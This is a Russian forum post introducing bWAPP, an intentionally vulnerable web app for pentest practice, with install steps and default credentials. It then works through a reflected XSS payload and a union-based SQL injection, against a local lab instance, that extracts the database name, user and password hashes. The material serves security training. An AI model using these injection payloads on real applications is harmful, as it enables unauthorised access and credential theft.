• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Soft Платформа для отработки навыков пентеста

Хочу рассказать о такой прелестной штуке как BWAPP это- веб-платформа для оттачивания скилов пентеста. По простому намеренно небезопасное веб-приложение. Сделано компанией

В данном приложении содержиться более 100 веб-багов

  • SQL, HTML, iFrame, SSI, OS Command, PHP, XML, XPath, LDAP, Host Header и SMTP инъекции
  • Cross-Site Scripting (XSS), Cross-Site Tracing (XST) и Cross-Site Request Forgery (CSRF)
  • Проблемы AJAX и веб-служб (jQuery/JSON/XML/SOAP/WSDL)
  • Вопросы аутентификации, авторизации и сессий, уязвимость выгрузки файлов и файлов бэкдоров
  • Произвольный доступ к файлам, лазание по директориями (directory traversals), локальное и удалённое внедрение файлов (LFI/RFI)
  • Проблемы конфигурации: Man-in-the-Middle, файлы cross-domain policy, раскрытие информации,…
  • HTTP parameter pollution, HTTP response splitting и HTTP verb tampering
  • Небезопасные конфигурации DistCC, FTP, NTP, Samba, SNMP, VNC и WebDAV
  • HTML5 ClickJacking, Cross-Origin Resource Sharing (CORS) и проблемы веб-хранилища
  • XML External Entity attacks (XXE) и Server Side Request Forgery (SSRF)
  • Уязвимости Heartbleed и Shellshock (OpenSSL), Атаки отказ-в-обслуживании (DoS)
  • Parameter tampering, cookie и password reset poisoning

  1. Скачайте .
  2. Переместите директорию 'bWAPP' (и всё содержимое) в корень вашего веб-сервера.
  3. Дайте полные разрешение на папки passwords,images,documents,logs.

    Код:
    chmod 777 passwords/
    
    chmod 777 images/
    
    chmod 777 documents/
    
    chmod 777 logs/
  4. Отредактируйте файл 'admin/settings.php' на ваши собственные настройки подключения к базе данных.

    Пример

    Код:
    $db_server = "localhost";   // сервер вашей базы данных (IP/имя)
    
    $db_username = "root";      // имя пользователь вашей MySQL
    
    $db_password = "";      // пароль базы данных
  5. Откройте в браузере файл 'install.php' в директории 'bWAPP

  6. Кликните на 'here' (Click 'here' to install bWAPP). Будет создана и заполнена база данных 'bWAPP'.
    bWAPP2.png

  7. Далее вас перенаправит не перенаправило, ну сами перейдите=))
  8. Войдите с учетными данными по умолчанию, или создайте нового пользователя, кстати по умолчанию логг/пасс bee/bug

После установки уже можете наслаждаться) и пытаться полностью пройти ее)

04.jpg


Выбираете ту уязвимость в которой хотите попрактиковаться и вперед)


Пару примеров что можно там делать:

XSS здесь много и на любой вкус.

Пожалуй выберем XSS — Reflected (GET)

Подставляем

Код:
<script>alert(1);</script>
60d1be71357342c2abc704ab43682df5.png

36063c26e43344ed8de920b0b3499f37.png
Выбираем sqlinjection get/search
В поле выбора фильма вбиваем то что хотите) я поискал железного человека и нашел)
42.jpg


Подставляем кавычку, получаем ошибку:

Код:
http://192.168.1.18/bWAPP/sqli_1.php?title=iron_man&action=search


Воспользуемся техникой order by и подберем количество столбцов:

Код:
http://192.168.1.18/bWAPP/sqli_1.php?title= iron_man %27%20order%20by%2010%20--%20&action=search


Оно равно 7:

Код:
http://192.168.1.18/bWAPP/sqli_1.php?title= iron_man %27%20order%20by%207%20--%20&action=search


Дальше используем union:

Код:
http://192.168.1.18/bWAPP/sqli_1.php?title= iron_man %27%20union%20select%201,2,3,4,5,6,7%20from%20users%20--%20&action=search
Получаем номера столбцов:
vlcsnap-2015-09-17-14h35m55s205.png


Получаем имя базы данных, имя юзера, хеш пароля:
Код:
http://192.168.1.18/bWAPP/sqli_1.php?title=iron_man%27%20union%20select%201,database%28%29,user%28%29,4,password,6,7%20from%20users%20--%20&action=search


b3bbf0314c7c4b5aaf48b31dcb8c9e3e.png
Cпасибо всем кто дочитал до конца) это моя первая статья-так что с почином меня)
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!